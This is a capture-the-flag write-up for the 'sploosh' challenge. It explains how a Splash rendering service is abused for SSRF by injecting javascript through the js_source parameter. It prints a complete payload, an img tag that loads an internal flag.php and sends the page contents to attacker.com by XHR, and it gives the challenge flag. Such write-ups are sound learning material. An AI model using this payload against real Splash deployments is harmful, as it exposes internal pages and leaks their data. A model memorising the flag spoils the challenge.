I wanted to make my own URL scraper, but parsing HTML is hard, so I used some random open source scraping project instead. http://sploosh.chal.perfect.blue/ - links to the source

When first opening the webpage, we’re also given the source. Looking at that, we find that the urls are submitted to a splash service, and we’re then just shown the (seemingly useless and constant) geometry information. Our target is to access flag.php from either the frontend or the splash service. So clearly, we can point the splash at our own webpage and start executing javascript there, achieving potentially a form of SSRF, since this is running on the splash machine.

Now the question becomes how we can properly circumvent the same-origin policy, so that we can read the flag and exfiltrate it to our server. When in doubt, RTFM. Rather than directly executing javascript on our page, we use our page as a way to trigger a new request to splash, and inject javascript in the target page through the js_source parameter. From there we can make an ajax request with the content of the page (which would obviously be the flag page) to our exfiltration listener. SOP still applies here, but because CORS exists, and browsers need to check it, we can still see the URL show up in our access logs. For the ajax request, we went with synchronous XHR, because it seemed that splash might terminate before the async requests made with fetch would be properly executed. The js_source also seemed to terminate at the first semicolon, so we instead join different statements/expressions together by embedding them in the same variable declaration statement.

The content of our attacker page we point the initial splash request to:

<img src="http://splash:8050/render.json?url=http%3A//172.16.0.14/flag.php&js_source=x=new%20XMLHttpRequest(),y=x.open('GET','https%3A//attacker.com/'%2Bdocument.body.innerHTML,false),z=x.send(null)">

Flag: pbctf{1_h0p3_y0u_us3d_lua_f0r_th1s} Nope, not at all :)